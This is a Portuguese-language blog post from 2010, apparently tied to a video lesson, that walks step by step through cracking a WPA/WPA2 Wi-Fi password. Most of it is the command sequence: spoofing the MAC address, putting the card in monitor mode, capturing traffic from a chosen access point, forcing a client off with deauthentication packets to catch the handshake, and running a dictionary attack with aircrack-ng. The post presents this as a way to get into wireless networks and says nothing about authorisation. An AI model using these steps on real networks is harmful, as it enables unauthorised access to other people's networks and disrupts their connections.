20/06/10

Crack Passwords Wpa/Wpa2

Crack Passwords Wpa/Wpa2 

 

Autor: MrTcp

Ferramentas: Airodump-ng, Airplay-ng,Aircrack-ng

Video : http://blip.tv/file/3429237/


Bem Vindos esta vídeo aula vamos ver como descobrir  uma password de uma rede wireless protegida por WPA2.
Para puder-mos descobrir uma senha wireless precisamos ter uma placa wireless que suporte injecção de pacotes, já existem varias a venda e só perguntar ao Google, placas compatíveis com Windows são mais difíceis de arranjar. Entretanto precisamos decidir que sistema operativo vamos usar eu pessoalmente prefiro Linux para estes serviços :-)
Vamos precisar de uma ferramenta chamada Aircrack-ng, esta ferramenta já vem instalada no Backtrack e com as drivers compiladas, se quiseres usar numa outra distribuição vais ter fazer o Download das drivers e respectivas Patches para a tua placa wireless, nesta vídeo aula não vamos ver como instalar e compilar as drivers, numa outra aula mais a frente talvez.
Para descobrir a password de uma rede wireless WPA2 temos de desautenticar o cliente do access point , para pudermos capturar os pacotes que contêm a password e depois a pudermos decifrar.

//Alterar o MacAddress da nossa placa wireless;

#ifconfig wlan0 down

#macchanger --mac 00:11:22:33:44:55 wlan0
//Colocar placa em modo monitor, depois de digitar-mos este comando vai ser criada uma outra interface no meu caso é a mon0

#airmon-ng start wlan0
//Verificar as redes wireless, verificar o canal em que a rede esta a operar e o bssid do AccessPoint para utilizar no airodump-ng
 
#airodump-ng mon0
//Depois de verificado o canal e o bssid usar o airodump-ng para capturar toda a informação para um ficheiro com o seguinte comando;
#airodump-ng -c 11 -w justtry --bssid 00:22:3F:D2:C6:AB mon0   

//Definiçoes : no -c colocamos o canal em que a rede esta a operar, no -w fica o nome do ficheiro que vamos gerar no --bssid colocamos o MacAddress do Access Point;

//Depois de estar tudo a ser capturado para o ficheiro temos de desautenticar o cliente do Access Point com o seguinte comando;

#aireplay-ng -0 20 -a 00:22:3F:D2:C6:AB -c 00:25:69:B5:27:F7 mon0
// Descrição : no parâmetro -0 e a opção do aireplay-ng para desautenticar os clientes dos AP's (Access Point's) o numero 20 é o numero de vezes que vai mandar as desautenticações, o -a colocamos o MacAddress do AP e no -c colocamos o MacAddress do Cliente, passado uns segundos temos o nosso HANDSHAKE, depois é só usar o aircrack-ng para crackar a password com o seguinte comando;
#aircrack-ng -w darkc0de.lst justtry_01.cap
//Descrição : no parametro -w utilizamos o caminho para o nosso dicionário no meu caso esta na raiz, depois colocamos o nome do ficheiro .pcap criado pelo airodump-ng
//Agora é só esperar ate a senha estar descoberta, lembre-se para que possam descobrir a password, ela tem de estar no vosso dicionário, senão nada feito. Existe técnicas como as Rainbow  Tables que permite-nos usar mais palavras por segundo do que este método aqui utilizado. Futuramente vou fazer uma vídeo aula de como criar Rainbow Tables para chaves wireless e outra de como as usar. Ate breve

0 comentários: